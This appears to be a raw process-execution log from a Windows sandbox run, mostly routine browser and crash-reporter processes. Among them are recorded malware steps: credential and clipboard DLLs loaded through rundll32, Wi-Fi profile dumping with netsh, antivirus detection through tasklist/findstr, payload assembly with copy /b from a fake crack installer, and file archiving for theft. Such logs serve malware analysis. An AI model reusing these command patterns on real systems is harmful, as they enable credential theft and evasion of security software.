C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1588

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000006011\bfe59db647.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1584

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14207:118:7zEvent27214

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual_installer_v4.67877\" -ad -an -ai#7zMap20012:112:7zEvent11390

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=828 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6136 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5944 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4636 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2892 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3288 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5852 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5460 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2380 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x64-700.exe

"C:\Users\Admin\Downloads\winrar-x64-700.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1664

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\ee4e8f0cd20b43c5814de249fdc5ae49 /t 4172 /p 4444

C:\Users\Admin\Downloads\winrar-x64-700.exe

"C:\Users\Admin\Downloads\winrar-x64-700.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1408

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\fed27ca11eed4c58926bd3f222349c9b /t 2880 /p 5448

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\ResetPop.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\e3cafcdbf76744f383bef4c9216a41e5 /t 5344 /p 4852

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Manual_installer_v4.67877.tar"

C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1508

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c move Blogs Blogs.bat & Blogs.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe

"C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 2

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Neil + Dust + Mercury + Infrared + Norfolk + Quoted + Classics + Interests + Iraq 2\Jr.pif

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Depression + Learned + Bind + Rapid 2\t

C:\Users\Admin\AppData\Local\Temp\2\Jr.pif

2\Jr.pif 2\t

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\0944c0b9532d40e0975f9b8d58251996 /t 2856 /p 3280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=2464 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5468 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5688 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5684 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2396 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5468 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5292 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=5332 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=5460 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3540 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbc8b39758,0x7ffbc8b39768,0x7ffbc8b39778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3276 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3968 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4952 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5164 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1600

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5372 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4892 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 652

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 896 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1248

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb9759758,0x7ffbb9759768,0x7ffbb9759778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

